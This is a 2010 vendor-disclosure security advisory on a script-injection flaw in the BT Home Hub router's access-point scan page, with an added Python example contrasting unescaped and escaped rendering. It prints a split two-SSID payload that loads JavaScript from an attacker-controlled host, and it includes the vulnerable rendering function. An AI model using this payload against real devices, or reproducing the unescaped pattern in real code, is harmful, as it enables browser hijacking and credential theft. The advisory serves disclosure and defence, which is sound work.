MWR InfoSecurity Security Advisory
BT Home Hub SSID Script Injection Vulnerability
10th May 2010




2010-05-10 Page 1 of 8

Contents

Contents ... 1
1 Detailed Vulnerability Description ... 5
1.1 Technical Background ... 5
1.2 Overview of Vulnerability ... 5
1.3 Exploit Information ... 6
1.4 Dependencies ... 6
2 Recommendations ... 7
3 References ... 7

BT Home Hub SSID Script Injection Vulnerability

Package Name: BT Home Hub Wireless ADSL Router
Date Discovered: May 2008
Vendor Contacted: July 2008
Affected Versions: Confirmed in Version 6.2.6.E. Hub 2 was not tested.
CVE Reference: Not Yet Assigned
Author: R. Dominguez Vega
Severity: Medium Risk
Local/Remote: Remote
Vulnerability Class: SSID Script Injection
Vendor: BT Home Hub - http://www.homehub.bt.com/
Vendor Response: The vendor has not addressed this issue and has accepted the risks exposed by this vulnerability. The vendor considers the risks to be low, due to the infrequent usage of the functionality by Home Hub users and the likelihood of the attack succeeding.

Overview:
The BT Home Hub provides wireless broadband solutions for home and office users (http://www.homehub.bt.com/). The BT Home Hub administrative web interface provides users with functionality such as firewall configuration, telephony and DHCP. The BT Home Hub also supports the addition of wireless repeaters supporting WDS (Wireless Distribution System). This functionality allows scanning for accessible wireless access points; the details of the identified access points are displayed in the administrative web interface.

Impact:
The BT Home Hub administrative web interface has been identified as being vulnerable to a script injection attack that could allow remote attackers to compromise the security of the device by performing Cross Site Scripting (XSS) attacks (http://www.owasp.org/index.php/top_10_2007-a1).

Cause:
Exploitation of this vulnerability is possible because the BT Home Hub administrative web interface does not properly sanitise parameters that are passed to it from identified access points. An attacker could set up a fake access point broadcasting specially crafted 802.11 beacon packets containing a malicious payload in the Service Set Identifier (SSID).

The malicious SSID will be displayed in the Accessible Access Points Table page of the BT Home Hub administrative interface and will be executed when an administrator scans for wireless access points.

Solution:
A fix has not been implemented by the vendor and no workaround to mitigate this vulnerability is known; it is therefore recommended that Home Hub users are aware of the risks this vulnerability exposes. Users who avoid the affected functionality will mitigate the risks exposed by the exploitation of this vulnerability.

1 Detailed Vulnerability Description

1.1 Technical Background

The 802.11 protocol is used in wireless local area network (WLAN) computer communication. The 802.11 protocol defines three main packet types (data, management and control) used for communication, managing and controlling the wireless network. Wireless access points provide wireless communication between computers and a wired network. Access points periodically send management beacon packets in order to announce their presence and provide information such as their SSID, the encryption in use and other parameters associated with the access point. Wireless clients scan 802.11 radio channels for management beacon packets in order to choose an access point with which to associate.

1.2 Overview of Vulnerability

The BT Home Hub web interface obtains information about the wireless access points which are in range from its inbuilt scan-for-access-points functionality. An attacker could set up a fake access point broadcasting, to all wireless devices within range, specially crafted 802.11 beacon packets containing a malicious payload in the SSID. The malicious SSID will be displayed in the Accessible Access Points Table page of the BT Home Hub administrative interface (/cgi/b/_wds_/cfg/?ce=1&be=1&l0=5&l1=0) and executed when an administrator scans for wireless access points. The BT Home Hub web interface runs with administrative privileges, and the malicious JavaScript code would be executed with the privileges of the user's browser. A screenshot of a JavaScript alert box being rendered on the Accessible Access Points Table page after a malicious management beacon packet was sent is included here:

[Figure 1: JavaScript rendered on the Repeater page]

It should be noted that SSIDs have a maximum length of 32 characters and, in some situations, this may not be sufficient to inject a usable malicious payload for an attack. However, an attacker could set up two fake access points and deliver a payload using the combined content of both SSIDs. Such a payload of 64 characters would be enough to redirect users to a malicious web server.

1.3 Exploit Information

One example of how this method could be used to compromise a device via this attack is outlined below. An attacker could set up two fake access points broadcasting specially crafted 802.11 beacon packets containing a malicious payload in the SSID. The injected code could be of the following form in the first access point:

    <script src=//attacker/.j>/*

The injected code could be of the following form in the second access point:

    */</script>

The two malicious SSIDs, combined with the use of JavaScript comment tags (/* */), make the following payload usable in an attack. This particular payload was chosen to minimise the space used in each SSID (each has a maximum size of 32 bytes): even though the combination of both SSIDs allows a payload of 64 characters, it is not possible to place JavaScript comment tags where desired, which prevents an arbitrary 64-character payload from being divided into two 32-byte SSIDs.

    <script src=//attacker/.j></script>

This code would execute in the Access Point Table page and reference a malicious script (.j) located on a host under the attacker's control. The scope of this malicious script is very large and it could perform multiple actions, from a phishing attack to browser key logging. Additionally, browser exploitation framework tools could be used by the attacker to perform a more dynamic exploitation. It should be noted that this type of attack could be performed without alerting the targeted users to the attack; an attacker would try to be as unobtrusive as possible and hide malicious actions from the targeted user.

1.4 Dependencies

In the attack described in this advisory the attacker would need to be in wireless range of the target device, and the affected device would need to be able to make a remote connection to the attacker's web server where the malicious script is hosted. It should be noted that an attacker could combine multiple payloads set in various SSIDs to perform an attack without requiring a connection to a remote web server. However, in practical terms this would be more complex, as it would require all of the malicious SSIDs to be rendered on the page in the correct order for the attack to be successfully executed.
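The defect described in sections 1.2 and 1.3 is untrusted beacon data being written into an HTML page without escaping. The following is an added example, not code from the advisory or from the BT Home Hub firmware: it renders a constructed scan result the vulnerable way and the hardened way (HTML-escaping every beacon-derived value), and includes a simple check a defender could run over scan logs to flag SSIDs that carry HTML or JavaScript metacharacters. The SSID fragments are constructed from the ones quoted above; the function names are assumptions.

```python
# Added example (not from the MWR advisory or the BT Home Hub firmware): shows the
# unescaped rendering of scan results beside a hardened version, plus a scan-log check.
import html

# Constructed scan results, modelled on the SSID fragments quoted in the advisory.
SCAN_RESULTS = [
    {"ssid": b"HomeHub-1234", "channel": 6},
    {"ssid": b"<script src=//attacker/.j>/*", "channel": 1},
    {"ssid": b"*/</script>", "channel": 11},
]

MAX_SSID_LEN = 32  # 802.11 SSID length limit in bytes


def decode_ssid(raw: bytes) -> str:
    """An SSID is up to 32 raw bytes and is not guaranteed to be valid text."""
    return raw[:MAX_SSID_LEN].decode("utf-8", errors="replace")


def render_row_vulnerable(ap: dict) -> str:
    # The defect: beacon-derived data concatenated straight into HTML.
    return f"<tr><td>{decode_ssid(ap['ssid'])}</td><td>{ap['channel']}</td></tr>"


def render_row_fixed(ap: dict) -> str:
    # Fix: HTML-escape every value derived from the beacon before it reaches the page,
    # and coerce numeric fields so they cannot carry markup either.
    ssid = html.escape(decode_ssid(ap["ssid"]), quote=True)
    return f"<tr><td>{ssid}</td><td>{int(ap['channel'])}</td></tr>"


def render_table(aps, row_fn) -> str:
    return "<table>" + "".join(row_fn(ap) for ap in aps) + "</table>"


def suspicious_ssids(aps) -> list:
    """Flag SSIDs containing HTML/JS metacharacters, e.g. when reviewing scan logs.
    Split payloads (comment tags across two SSIDs) are caught by the '/*' and '*/' markers."""
    markers = ("<", ">", "/*", "*/", "javascript:")
    return [decode_ssid(ap["ssid"]) for ap in aps
            if any(m in decode_ssid(ap["ssid"]) for m in markers)]


if __name__ == "__main__":
    print(render_table(SCAN_RESULTS, render_row_vulnerable))  # script tag reaches the page
    print(render_table(SCAN_RESULTS, render_row_fixed))       # rendered as inert text
    print(suspicious_ssids(SCAN_RESULTS))
```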

2 Recommendations

A fix has not been implemented by the vendor and no workaround to mitigate this vulnerability is known; it is therefore recommended that Home Hub users are aware of the risks this vulnerability exposes. Users who avoid the affected functionality will mitigate the risks exposed by the exploitation of this vulnerability.

3 References

BT Home Hub - http://www.homehub.bt.com/
OWASP Top 10 2007 - Cross Site Scripting - http://www.owasp.org/index.php/top_10_2007-a1
Whitepaper: Behind Enemy Lines - http://www.mwrinfosecurity.com/publications/mwri_behind-enemy-lines_2008-07-25.pdf

MWR InfoSecurity
St. Clement House, 1-3 Alencon Link, Basingstoke, RG21 7SB
Tel: +44 (0)1256 300920
Fax: +44 (0)1256 844083
mwrinfosecurity.com